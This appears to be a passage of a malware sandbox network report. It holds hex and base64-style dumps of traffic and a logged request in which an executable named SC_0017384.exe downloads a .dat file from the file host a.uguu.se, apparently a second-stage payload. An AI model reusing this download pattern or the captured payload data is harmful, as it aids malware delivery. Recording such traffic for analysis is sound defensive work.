                                                                            Data Ascii: wQABcd+AAAAKiD///oiPxcIEf//+SU4AAAALyAmBgAC8ygDEQAR///5OTgAAAAgIP///644///5SDgAAAAEIAMTlFgBE1gXJQERAwL///lfOAAAAA4gJv//+Wo5BAAFdHsEAAXHfgAAAAUgAAAAmf///X////5KAAAARQAAAARFBRH///mVOAAAAAEgJv//+aA5BAAFn3sEAAXHfgAAAAEg///7xjj///m5OAAAACEgAAABVzmUWAERAwL///nO
                                                                            2023-03-21 08:10:10 UTC1728INData Raw: 33 37 2f 2f 2f 77 37 4f 41 41 41 41 42 63 67 41 41 41 41 61 44 34 41 41 41 45 66 49 41 63 52 2f 2f 2f 38 55 54 67 41 41 41 41 38 49 41 51 41 41 4b 79 41 41 67 41 41 58 49 30 67 48 77 41 41 41 71 30 34 42 41 41 41 73 6f 41 42 41 41 41 44 6a 52 34 66 2f 2f 2f 38 65 44 67 41 41 41 41 4e 49 43 62 2f 2f 2f 79 44 4f 67 51 41 42 62 46 37 42 41 41 46 78 33 34 41 41 41 41 51 49 41 55 54 41 41 41 41 6b 43 44 2f 2f 2f 79 65 4f 41 41 41 41 43 73 67 4a 76 2f 2f 2f 4b 6b 35 42 41 41 46 72 6e 73 45 41 41 58 48 66 67 41 41 41 42 59 67 41 41 41 42 71 44 34 66 48 77 67 52 41 41 41 43 31 54 67 44 45 78 62 2f 2f 2f 7a 4f 4f 41 41 41 41 47 55 67 4a 76 2f 2f 2f 4e 6b 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41 41 47 4d 67 6e 67 34 66 45 42 38 45 41 41 43 75 66 76 2f 2f
                                                                            Data Ascii: 37///w7OAAAABcgAAAAaD4AAAEfIAcR///8UTgAAAA8IAQAAKyAAgAAXI0gHwAAAq04BAAAsoABAAADjR4f///8eDgAAAANICb///yDOgQABbF7BAAFx34AAAAQIAUTAAAAkCD///yeOAAAACsgJv///Kk5BAAFrnsEAAXHfgAAABYgAAABqD4fHwgRAAAC1TgDExb///zOOAAAAGUgJv///Nk6BAAFmXsEAAXHfgAAAGMgng4fEB8EAACufv//
                                                                            2023-03-21 08:10:10 UTC1744INData Raw: 62 63 67 2f 2f 2f 2b 35 7a 67 41 41 41 41 42 49 43 62 2f 2f 2f 37 79 4f 67 51 41 42 5a 70 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 41 42 38 35 41 41 41 4d 2f 76 2f 2f 2f 77 38 34 41 41 41 41 42 53 41 45 41 41 43 65 66 51 45 41 41 44 69 4e 57 52 38 2f 57 46 51 67 59 51 42 78 76 30 30 67 48 30 37 6e 4b 53 41 41 41 41 6e 2b 2f 2f 2f 2f 4f 44 67 41 41 41 41 41 49 43 62 2f 2f 2f 39 44 4f 67 51 41 42 5a 4a 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 44 76 34 47 41 41 4b 4f 4b 41 59 41 41 6f 30 6f 42 41 41 41 6e 48 34 47 41 41 4b 4d 4b 50 2f 2f 2f 32 38 34 41 41 41 41 42 43 44 2f 2f 2f 2b 62 4f 50 2f 2f 2f 36 41 34 4a 67 6f 41 41 4c 31 76 61 59 34 45 41 41 43 65 65 77 41 41 43 66 35 6c 59 67 41 41 41 41 49 67 41 41 41 41 41 43 41 45 41 41 43 65
                                                                            Data Ascii: bcg///+5zgAAAABICb///7yOgQABZp7BAAFx34AAAAAIAAAAB85AAAM/v///w84AAAABSAEAACefQEAADiNWR8/WFQgYQBxv00gH07nKSAAAAn+////ODgAAAAAICb///9DOgQABZJ7BAAFx34AAAAAIAAADv4GAAKOKAYAAo0oBAAAnH4GAAKMKP///284AAAABCD///+bOP///6A4JgoAAL1vaY4EAACeewAACf5lYgAAAAIgAAAAACAEAACe
                                                                            2023-03-21 08:10:10 UTC1760INData Raw: 38 34 41 41 41 53 41 41 41 41 42 36 67 41 41 42 76 34 41 41 41 4d 36 41 41 41 43 6d 51 41 41 42 6e 6f 41 41 41 62 6a 41 41 41 43 36 51 41 41 41 36 38 41 41 41 54 41 41 41 41 42 78 41 41 41 41 34 77 41 41 41 50 79 41 41 41 43 51 51 41 41 42 50 30 41 41 41 41 46 41 41 41 41 55 41 41 41 42 4c 45 41 41 41 67 46 41 41 41 45 5a 41 41 41 42 54 6b 41 41 41 48 35 41 41 41 46 68 41 41 41 41 79 30 41 41 41 4c 59 41 41 41 42 6d 67 41 41 42 52 6b 41 41 41 54 4f 41 41 41 44 70 77 41 41 41 61 6b 41 41 41 62 57 41 41 41 42 48 77 41 41 41 76 67 41 41 41 56 7a 41 41 41 43 61 67 41 41 41 56 49 41 41 41 61 58 41 41 41 48 38 67 41 41 42 55 4d 41 41 41 4e 2b 41 41 41 48 4b 77 41 41 42 46 4d 41 41 41 41 55 41 41 41 49 44 51 41 41 42 41 45 41 41 41 5a 5a 41 41 41 47 70 51 41 41
                                                                            Data Ascii: 84AAASAAAAB6gAABv4AAAM6AAACmQAABnoAAAbjAAAC6QAAA68AAATAAAABxAAAA4wAAAPyAAACQQAABP0AAAAFAAAAUAAABLEAAAgFAAAEZAAABTkAAAH5AAAFhAAAAy0AAALYAAABmgAABRkAAATOAAADpwAAAakAAAbWAAABHwAAAvgAAAVzAAACagAAAVIAAAaXAAAH8gAABUMAAAN+AAAHKwAABFMAAAAUAAAIDQAABAEAAAZZAAAGpQAA
                                                                            2023-03-21 08:10:10 UTC1776INData Raw: 64 6f 41 41 41 65 49 41 41 41 44 61 77 41 41 42 48 77 41 41 41 55 49 41 41 41 44 68 41 41 41 42 36 77 41 41 41 58 71 41 41 41 44 65 67 41 41 43 48 34 41 41 41 50 4f 41 41 41 42 2b 77 41 41 41 41 55 41 41 41 45 32 41 41 41 41 71 51 41 41 43 41 51 41 41 41 46 32 41 41 41 44 37 67 41 41 41 6c 6b 41 41 41 51 67 41 41 41 44 43 67 41 41 41 76 63 41 41 41 4b 78 41 41 41 47 35 67 41 41 42 70 73 41 41 41 67 6f 41 41 41 43 44 41 41 41 42 56 73 41 41 41 4b 6b 41 41 41 44 4f 51 41 41 42 39 34 41 41 41 55 66 41 41 41 44 4c 67 41 41 41 42 59 41 41 41 5a 33 41 41 41 42 74 67 41 41 41 61 4d 41 41 41 4c 52 41 41 41 41 66 51 41 41 41 55 51 41 41 41 42 48 52 51 41 51 44 50 34 41 41 41 64 78 4f 42 77 54 43 67 41 41 6e 57 38 4b 41 41 43 63 62 77 45 52 41 41 44 2f 2f 2f 2b 35
                                                                            Data Ascii: doAAAeIAAADawAABHwAAAUIAAADhAAAB6wAAAXqAAADegAACH4AAAPOAAAB+wAAAAUAAAE2AAAAqQAACAQAAAF2AAAD7gAAAlkAAAQgAAADCgAAAvcAAAKxAAAG5gAABpsAAAgoAAACDAAABVsAAAKkAAADOQAAB94AAAUfAAADLgAAABYAAAZ3AAABtgAAAaMAAALRAAAAfQAAAUQAAABHRQAQDP4AAAdxOBwTCgAAnW8KAACcbwERAAD///+5
                                                                            2023-03-21 08:10:10 UTC1792INData Raw: 41 41 46 78 33 34 41 41 41 42 42 49 50 2f 2f 2b 35 67 34 2f 2f 2f 34 2f 54 67 41 41 41 42 58 49 41 6b 54 46 77 41 41 42 51 59 34 41 41 41 46 45 54 67 57 2f 2f 2f 35 46 54 67 41 41 41 41 6c 49 43 62 2f 2f 2f 6b 67 4f 51 51 41 42 58 4a 37 42 41 41 46 78 33 34 41 41 41 41 46 49 50 2f 2f 2f 4a 59 34 2f 2f 2f 35 4f 54 67 41 41 41 41 78 49 43 62 2f 2f 2f 6c 45 4f 67 51 41 42 62 70 37 42 41 41 46 78 33 34 41 41 41 42 4d 49 41 41 41 41 57 63 34 2f 2f 2f 35 58 54 67 41 41 41 42 52 49 43 62 2f 2f 2f 6c 6f 4f 67 51 41 42 63 70 37 42 41 41 46 78 33 34 41 41 41 42 59 49 50 2f 2f 2f 2b 63 36 41 52 45 41 41 41 56 33 4f 41 41 41 42 58 30 34 42 67 41 43 47 53 67 71 41 52 45 41 41 41 49 35 4f 50 2f 2f 2f 72 6f 34 2f 2f 2f 35 6e 7a 67 41 41 41 41 72 49 41 63 54 2b 42 2f 2f
                                                                            Data Ascii: AAFx34AAABBIP//+5g4///4/TgAAABXIAkTFwAABQY4AAAFETgW///5FTgAAAAlICb///kgOQQABXJ7BAAFx34AAAAFIP///JY4///5OTgAAAAxICb///lEOgQABbp7BAAFx34AAABMIAAAAWc4///5XTgAAABRICb///loOgQABcp7BAAFx34AAABYIP///+c6AREAAAV3OAAABX04BgACGSgqAREAAAI5OP///ro4///5nzgAAAArIAcT+B//
                                                                            2023-03-21 08:10:10 UTC1808INData Raw: 33 73 41 41 41 5a 65 41 41 41 42 59 51 41 41 42 68 6b 41 41 41 4b 56 41 41 41 44 72 51 41 41 41 45 30 41 41 41 42 57 41 41 41 47 65 51 41 41 42 4e 59 41 41 41 4b 4c 41 41 41 47 73 67 41 41 42 4c 49 41 41 41 69 4d 41 41 41 46 35 41 41 41 42 53 55 41 41 41 42 35 41 41 41 44 44 77 41 41 42 71 4d 41 41 41 54 76 41 41 41 41 42 51 41 41 42 48 38 41 41 41 63 47 41 41 41 43 39 67 41 41 42 65 30 41 41 41 64 59 41 41 41 43 75 51 41 41 41 4b 34 41 41 41 51 42 41 41 41 45 45 41 41 41 42 6f 4d 41 41 41 56 2b 41 41 41 43 43 41 41 41 42 44 77 41 41 41 66 6b 41 41 41 43 59 51 41 41 42 38 30 41 41 41 42 71 41 41 41 44 6b 51 41 41 42 44 49 41 41 41 45 2b 41 41 41 41 2b 41 41 41 42 67 67 41 41 41 59 2b 41 41 41 43 7a 51 41 41 42 4f 41 41 41 41 58 39 41 41 41 41 50 41 41 41
                                                                            Data Ascii: 3sAAAZeAAABYQAABhkAAAKVAAADrQAAAE0AAABWAAAGeQAABNYAAAKLAAAGsgAABLIAAAiMAAAF5AAABSUAAAB5AAADDwAABqMAAATvAAAABQAABH8AAAcGAAAC9gAABe0AAAdYAAACuQAAAK4AAAQBAAAEEAAABoMAAAV+AAACCAAABDwAAAfkAAACYQAAB80AAABqAAADkQAABDIAAAE+AAAA+AAABggAAAY+AAACzQAABOAAAAX9AAAAPAAA
                                                                            2023-03-21 08:10:10 UTC1824INData Raw: 2f 6a 2b 4f 41 41 41 41 41 38 67 2f 2f 2f 39 4f 7a 6a 2f 2f 2f 6b 4e 4f 41 41 41 41 43 55 67 4a 76 2f 2f 2b 52 67 36 42 41 41 46 73 33 73 45 41 41 58 48 66 67 41 41 41 44 49 67 43 78 4f 45 48 2f 2f 2f 2b 54 41 34 41 41 41 41 42 69 44 2f 2f 2f 35 55 4f 50 2f 2f 2f 50 73 34 43 68 4d 57 41 41 41 42 74 7a 6a 2f 2f 2f 36 62 4f 50 2f 2f 2b 56 45 34 41 41 41 41 41 53 41 6d 2f 2f 2f 35 58 44 6f 45 41 41 57 75 65 77 51 41 42 63 64 2b 41 41 41 41 49 43 41 45 45 78 58 2f 2f 2f 75 75 4f 41 41 41 41 67 48 2f 2f 2f 77 39 2f 2f 2f 37 2b 66 2f 2f 2f 54 30 41 41 41 41 45 52 56 6c 42 48 77 45 52 2f 2f 2f 35 6b 6a 67 41 41 41 41 4b 49 43 62 2f 2f 2f 6d 64 4f 67 51 41 42 59 68 37 42 41 41 46 78 33 34 41 41 41 41 4b 49 50 2f 2f 2f 47 55 34 2f 2f 2f 35 74 6a 67 41 41 41 41 61
                                                                            Data Ascii: /j+OAAAAA8g///9Ozj///kNOAAAACUgJv//+Rg6BAAFs3sEAAXHfgAAADIgCxOEH///+TA4AAAABiD///5UOP///Ps4ChMWAAABtzj///6bOP//+VE4AAAAASAm///5XDoEAAWuewQABcd+AAAAICAEExX///uuOAAAAgH///w9///7+f///T0AAAAERVlBHwER///5kjgAAAAKICb///mdOgQABYh7BAAFx34AAAAKIP///GU4///5tjgAAAAa
                                                                            2023-03-21 08:10:10 UTC1840INData Raw: 32 55 41 41 41 42 61 41 41 41 41 54 51 41 41 41 4d 41 41 41 41 4a 34 41 41 41 45 39 77 41 41 41 4c 63 41 41 41 4e 30 41 41 41 47 30 51 41 41 41 65 45 41 41 41 4b 38 41 41 41 43 56 41 41 41 41 2f 77 41 41 41 49 38 41 41 41 42 6a 67 41 41 43 4e 59 41 41 41 65 65 41 41 41 48 77 67 41 41 41 55 77 41 41 41 43 72 41 41 41 45 71 77 41 41 42 55 6f 41 41 41 4a 47 41 41 41 45 78 67 41 41 42 47 45 41 41 41 43 4c 41 41 41 43 32 41 41 41 43 44 6f 41 41 41 51 6f 41 41 41 43 47 41 41 41 41 48 34 41 41 41 52 59 41 41 41 41 51 6b 55 41 46 51 7a 2b 41 41 41 41 42 44 67 41 41 41 41 4f 49 43 59 41 41 41 41 50 4f 67 51 41 42 58 74 37 42 41 41 46 78 33 34 41 41 41 41 69 49 41 41 41 43 53 55 34 41 41 41 41 41 41 41 4c 4c 54 67 41 41 41 73 79 41 41 41 41 41 55 55 41 43 77 7a 2b
                                                                            Data Ascii: 2UAAABaAAAATQAAAMAAAAJ4AAAE9wAAALcAAAN0AAAG0QAAAeEAAAK8AAACVAAAA/wAAAI8AAABjgAACNYAAAeeAAAHwgAAAUwAAACrAAAEqwAABUoAAAJGAAAExgAABGEAAACLAAAC2AAACDoAAAQoAAACGAAAAH4AAARYAAAAQkUAFQz+AAAABDgAAAAOICYAAAAPOgQABXt7BAAFx34AAAAiIAAACSU4AAAAAAALLTgAAAsyAAAAAUUACwz+
                                                                            2023-03-21 08:10:10 UTC1856INData Raw: 41 41 41 44 53 41 47 45 2f 73 66 41 41 41 42 38 6a 6a 2f 2f 2f 2b 6d 4f 50 2f 2f 2f 78 51 34 41 41 41 43 4e 54 67 41 41 50 2f 2f 2f 49 67 34 41 41 41 41 51 53 41 6d 2f 2f 2f 38 6b 7a 6b 45 41 41 56 37 65 77 51 41 42 63 64 2b 41 41 41 41 4e 43 41 41 41 41 4f 35 4f 50 2f 2f 2f 4b 77 34 41 41 41 41 42 69 41 46 45 2f 63 66 2f 2f 2f 38 75 6a 67 41 41 41 41 7a 49 41 51 54 64 42 38 41 41 41 58 6c 4f 41 77 54 2b 52 2f 2f 2f 2f 7a 52 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 4e 77 36 42 41 41 46 68 6e 73 45 41 41 58 48 66 67 41 41 41 45 59 67 41 41 41 43 63 44 67 41 41 41 46 70 4f 41 4d 54 68 68 2f 2f 2f 2f 7a 2b 4f 41 41 41 41 42 67 67 2f 2f 2f 2f 56 7a 6a 2f 2f 2f 30 4e 4f 41 41 41 41 44 55 67 4a 76 2f 2f 2f 52 67 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41
                                                                            Data Ascii: AAADSAGE/sfAAAB8jj///+mOP///xQ4AAACNTgAAP///Ig4AAAAQSAm///8kzkEAAV7ewQABcd+AAAANCAAAAO5OP///Kw4AAAABiAFE/cf///8ujgAAAAzIAQTdB8AAAXlOAwT+R////zROAAAAAAgJv///Nw6BAAFhnsEAAXHfgAAAEYgAAACcDgAAAFpOAMThh////z+OAAAABgg////Vzj///0NOAAAADUgJv///Rg6BAAFmXsEAAXHfgAA
                                                                            2023-03-21 08:10:10 UTC1872INData Raw: 2f 75 56 4f 41 41 41 41 44 63 67 2f 2f 2f 2f 59 54 6a 2f 2f 2f 75 6b 4f 41 41 41 41 41 34 67 42 42 4f 44 48 2f 2f 2f 2b 37 49 34 41 41 41 41 47 69 44 2f 2f 2f 39 50 4f 50 2f 2f 2b 38 45 34 41 41 41 41 49 43 41 6d 2f 2f 2f 37 7a 44 6b 45 41 41 57 71 65 77 51 41 42 63 64 2b 41 41 41 41 48 79 41 41 41 41 45 66 4f 50 2f 2f 2b 2b 55 34 41 41 41 41 4e 53 41 47 45 34 63 66 2f 2f 2f 37 38 7a 67 41 41 41 41 4d 49 41 51 54 67 68 2f 2f 2f 2f 77 42 4f 41 41 41 41 42 59 67 4a 76 2f 2f 2f 41 77 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 4d 67 2f 2f 2f 2b 32 54 6a 2f 2f 2f 2b 70 4f 41 45 54 46 76 2f 2f 2f 43 30 34 41 41 41 41 43 53 41 42 45 32 45 39 48 77 45 52 2f 2f 2f 2f 4d 54 67 48 45 33 6f 66 2f 2f 2f 38 52 7a 67 41 41 41 41 41 49 43 62 2f 2f 2f 78 53
                                                                            Data Ascii: /uVOAAAADcg////YTj///ukOAAAAA4gBBODH///+7I4AAAAGiD///9POP//+8E4AAAAICAm///7zDkEAAWqewQABcd+AAAAHyAAAAEfOP//++U4AAAANSAGE4cf///78zgAAAAMIAQTgh////wBOAAAABYgJv///Aw6BAAFn3sEAAXHfgAAAAMg///+2Tj///+pOAETFv///C04AAAACSABE2E9HwER////MTgHE3of///8RzgAAAAAICb///xS
                                                                            2023-03-21 08:10:10 UTC1888INData Raw: 2f 2f 36 58 44 6f 45 41 41 57 73 65 77 51 41 42 63 64 2b 41 41 41 41 58 79 41 75 45 32 46 44 48 79 34 52 41 41 41 4e 38 6a 67 41 41 41 33 39 4f 42 59 41 41 41 4f 49 4f 41 41 41 44 75 67 34 41 41 41 47 72 44 67 50 45 31 67 6f 48 77 38 52 41 48 6f 4b 41 41 42 53 63 2f 2f 2f 2b 70 38 34 41 41 41 41 57 69 41 73 45 2f 67 66 2f 2f 2f 36 72 54 67 41 41 41 41 73 49 41 41 41 42 38 38 34 2f 2f 2f 39 56 6a 67 64 45 77 48 2b 46 67 59 41 41 49 64 76 41 68 49 4d 45 51 41 52 4e 52 45 45 41 41 41 4c 65 77 51 52 42 41 41 41 4b 48 35 36 43 67 41 41 55 6e 50 2f 2f 2f 72 6c 4f 41 41 41 41 41 67 67 4a 76 2f 2f 2b 76 41 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 51 67 4c 52 4d 61 2f 2f 2f 37 42 7a 67 41 41 41 42 65 49 41 38 54 57 41 41 41 41 50 67 67 42 68 46 36
                                                                            Data Ascii: //6XDoEAAWsewQABcd+AAAAXyAuE2FDHy4RAAAN8jgAAA39OBYAAAOIOAAADug4AAAGrDgPE1goHw8RAHoKAABSc///+p84AAAAWiAsE/gf///6rTgAAAAsIAAAB884///9VjgdEwH+FgYAAIdvAhIMEQARNREEAAALewQRBAAAKH56CgAAUnP///rlOAAAAAggJv//+vA6BAAFn3sEAAXHfgAAAAQgLRMa///7BzgAAABeIA8TWAAAAPggBhF6
                                                                            2023-03-21 08:10:10 UTC1904INData Raw: 41 41 41 41 42 4d 67 4a 76 2f 2f 2b 32 55 35 42 41 41 46 73 48 73 45 41 41 58 48 66 67 41 41 41 44 67 67 2f 2f 2f 38 78 54 6a 2f 2f 2f 74 2b 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2b 34 6b 35 42 41 41 46 6e 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 78 4e 68 51 52 38 44 45 66 2f 2f 2b 36 51 34 41 41 41 41 4d 79 44 2f 2f 2f 2b 43 4f 50 2f 2f 2b 37 4d 34 41 41 41 41 4c 69 41 6d 2f 2f 2f 37 76 6a 6f 45 41 41 57 55 65 77 51 41 42 63 64 2b 41 41 41 41 48 43 41 41 41 41 41 75 4f 50 2f 2f 2b 39 63 34 41 41 41 41 49 79 41 41 41 41 4c 38 2f 2f 2f 39 2b 76 2f 2f 2f 61 6f 41 41 41 41 44 52 56 67 39 48 77 4d 52 2f 2f 2f 37 39 7a 67 41 41 41 41 38 49 50 2f 2f 2f 58 41 34 2f 2f 2f 38 42 6a 67 41 41 41 41 68 49 43 62 2f 2f 2f 77 52 4f 51 51 41 42 59 64 37 42 41 41 46
                                                                            Data Ascii: AAAABMgJv//+2U5BAAFsHsEAAXHfgAAADgg///8xTj///t+OAAAAAAgJv//+4k5BAAFnnsEAAXHfgAAAAAgAxNhQR8DEf//+6Q4AAAAMyD///+COP//+7M4AAAALiAm///7vjoEAAWUewQABcd+AAAAHCAAAAAuOP//+9c4AAAAIyAAAAL8///9+v///aoAAAADRVg9HwMR///79zgAAAA8IP///XA4///8BjgAAAAhICb///wROQQABYd7BAAF
                                                                            2023-03-21 08:10:10 UTC1920INData Raw: 4f 61 64 49 48 41 41 42 61 46 79 41 67 59 41 41 53 55 6f 41 41 44 74 68 43 42 77 41 41 56 56 63 67 6f 41 41 44 4e 76 43 78 48 2f 2f 2f 77 4e 4f 41 41 41 41 42 67 67 4a 76 2f 2f 2f 42 67 36 42 41 41 46 78 58 73 45 41 41 58 48 66 67 41 41 41 41 59 67 2f 2f 2f 39 58 54 6a 2f 2f 2f 77 78 4f 41 41 41 41 44 6b 67 4a 76 2f 2f 2f 44 77 36 42 41 41 46 6d 6e 73 45 41 41 58 48 66 67 41 41 41 44 6b 67 41 41 41 43 5a 77 41 41 42 46 45 41 41 41 4c 62 41 41 41 41 41 30 56 5a 50 42 38 48 45 51 41 41 41 61 51 34 41 41 41 43 66 7a 6a 2f 2f 2f 78 77 4f 41 41 41 41 42 6b 67 4a 76 2f 2f 2f 48 73 35 42 41 41 46 71 48 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 42 48 54 6a 2f 2f 2f 79 55 4f 41 41 41 41 43 77 67 4a 76 2f 2f 2f 4a 38 35 42 41 41 46 75 33 73 45 41 41 58 48
                                                                            Data Ascii: OadIHAABaFyAgYAASUoAADthCBwAAVVcgoAADNvCxH///wNOAAAABggJv///Bg6BAAFxXsEAAXHfgAAAAYg///9XTj///wxOAAAADkgJv///Dw6BAAFmnsEAAXHfgAAADkgAAACZwAABFEAAALbAAAAA0VZPB8HEQAAAaQ4AAACfzj///xwOAAAABkgJv///Hs5BAAFqHsEAAXHfgAAAAogAAABHTj///yUOAAAACwgJv///J85BAAFu3sEAAXH
                                                                            2023-03-21 08:10:10 UTC1936INData Raw: 2f 79 45 4f 50 2f 2f 2b 65 6b 34 41 41 41 41 43 69 41 6d 2f 2f 2f 35 39 44 6f 45 41 41 56 38 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 44 45 32 45 36 48 77 4d 52 2f 2f 2f 36 44 7a 67 41 41 41 41 53 49 41 41 41 41 68 67 34 2f 2f 2f 36 47 6a 67 41 42 77 37 2b 41 41 41 41 4b 53 41 4a 45 34 4d 66 2f 2f 2f 36 4d 44 67 41 41 41 41 53 49 43 62 2f 2f 2f 6f 37 4f 51 51 41 42 5a 74 37 42 41 41 46 78 33 34 41 41 41 42 4b 49 41 55 54 59 54 67 66 42 52 48 2f 2f 2f 70 57 4f 41 41 41 41 44 38 67 41 41 41 44 36 44 6a 2f 2f 2f 70 6c 4f 41 41 41 41 45 41 67 4a 76 2f 2f 2b 6e 41 35 42 41 41 46 75 6e 73 45 41 41 58 48 66 67 41 41 41 44 59 67 41 68 4e 38 48 2f 2f 2f 2f 4f 4d 34 41 41 41 43 6a 44 6a 2f 2f 2f 71 53 4f 41 41 41 41 44 73 67 2f 2f 2f 39 6d 2f 2f 2f 2f 57 76 2f
                                                                            Data Ascii: /yEOP//+ek4AAAACiAm///59DoEAAV8ewQABcd+AAAAAiADE2E6HwMR///6DzgAAAASIAAAAhg4///6GjgABw7+AAAAKSAJE4Mf///6MDgAAAASICb///o7OQQABZt7BAAFx34AAABKIAUTYTgfBRH///pWOAAAAD8gAAAD6Dj///plOAAAAEAgJv//+nA5BAAFunsEAAXHfgAAADYgAhN8H////OM4AAACjDj///qSOAAAADsg///9m////Wv/
                                                                            2023-03-21 08:10:10 UTC1952INData Raw: 41 42 74 49 43 62 2f 2f 2f 73 54 4f 67 51 41 42 5a 5a 37 42 41 41 46 78 33 34 41 41 41 41 77 49 41 41 41 43 33 49 34 2f 2f 2f 37 4c 44 67 41 41 41 41 33 49 41 59 41 41 53 73 6f 2f 2f 2f 37 4f 7a 67 41 41 41 41 4a 49 43 62 2f 2f 2f 74 47 4f 67 51 41 42 62 6c 37 42 41 41 46 78 33 34 41 41 41 41 4d 49 41 41 41 41 67 63 34 41 41 41 41 41 41 52 55 4f 42 73 54 2b 68 38 41 41 42 42 79 4f 41 41 41 45 48 30 34 46 76 2f 2f 2b 33 55 34 41 41 41 41 54 53 41 59 45 33 34 66 2f 2f 2f 37 67 7a 67 41 41 41 43 4b 49 41 41 41 44 38 30 34 2f 2f 2f 37 6b 6a 67 41 41 41 42 56 49 43 62 2f 2f 2f 75 64 4f 67 51 41 42 5a 64 37 42 41 41 46 78 33 34 41 41 41 42 67 49 41 41 41 43 39 59 41 41 41 6e 69 41 41 41 4e 4f 67 41 41 41 41 4e 46 57 54 34 66 47 42 48 2f 2f 2f 76 44 4f 41 41 51
                                                                            Data Ascii: ABtICb///sTOgQABZZ7BAAFx34AAAAwIAAAC3I4///7LDgAAAA3IAYAASso///7OzgAAAAJICb///tGOgQABbl7BAAFx34AAAAMIAAAAgc4AAAAAARUOBsT+h8AABByOAAAEH04Fv//+3U4AAAATSAYE34f///7gzgAAACKIAAAD804///7kjgAAABVICb///udOgQABZd7BAAFx34AAABgIAAAC9YAAAniAAANOgAAAANFWT4fGBH///vDOAAQ


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.549700188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2023-03-21 08:11:06 UTC1954OUTGET /fwvfviJb.dat HTTP/1.1
                                                                            Host: a.uguu.se
                                                                            Connection: Keep-Alive
                                                                            2023-03-21 08:11:06 UTC1954INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Tue, 21 Mar 2023 08:11:06 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 2000896
                                                                            Last-Modified: Mon, 20 Mar 2023 22:39:50 GMT
                                                                            Connection: close
                                                                            ETag: "6418e0b6-1e8800"
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Content-Security-Policy: default-src 'self' http: https: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Accept-Ranges: bytes
                                                                            2023-03-21 08:11:06 UTC1955INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                            2023-03-21 08:11:06 UTC1970INData Raw: 73 63 75 62 33 55 33 36 37 38 44 41 41 39 37 33 42 6e 74 57 46 52 4e 2f 7a 69 6e 37 54 66 48 45 6e 6b 4b 56 73 61 71 78 46 6d 55 58 7a 76 35 79 75 42 66 35 35 46 50 75 53 61 78 77 52 70 70 53 52 57 42 53 48 4f 77 39 6c 4f 74 58 6f 57 61 34 44 6f 36 49 73 72 55 35 37 6b 32 2f 54 62 41 79 50 42 72 79 73 38 50 72 36 57 32 76 56 61 46 44 4e 51 62 54 6b 4d 68 44 4d 72 50 79 53 31 76 43 31 6b 73 31 66 47 76 7a 4d 5a 69 4a 63 47 2f 65 53 73 37 62 45 5a 57 33 4e 62 2f 64 35 4b 76 41 4a 6e 34 79 4f 79 7a 47 53 48 4e 48 75 66 69 54 6e 43 36 73 7a 7a 75 39 6a 71 63 61 74 6c 2b 4b 55 6d 72 4a 4a 46 42 75 63 72 41 41 68 7a 4d 64 39 41 65 45 73 4e 74 44 32 43 71 36 70 67 74 66 4e 7a 56 4f 7a 2b 6e 35 69 77 36 68 78 36 33 75 45 71 6a 37 30 79 37 4c 51 51 66 74 5a 54 50
                                                                            Data Ascii: scub3U3678DAA973BntWFRN/zin7TfHEnkKVsaqxFmUXzv5yuBf55FPuSaxwRppSRWBSHOw9lOtXoWa4Do6IsrU57k2/TbAyPBrys8Pr6W2vVaFDNQbTkMhDMrPyS1vC1ks1fGvzMZiJcG/eSs7bEZW3Nb/d5KvAJn4yOyzGSHNHufiTnC6szzu9jqcatl+KUmrJJFBucrAAhzMd9AeEsNtD2Cq6pgtfNzVOz+n5iw6hx63uEqj70y7LQQftZTP
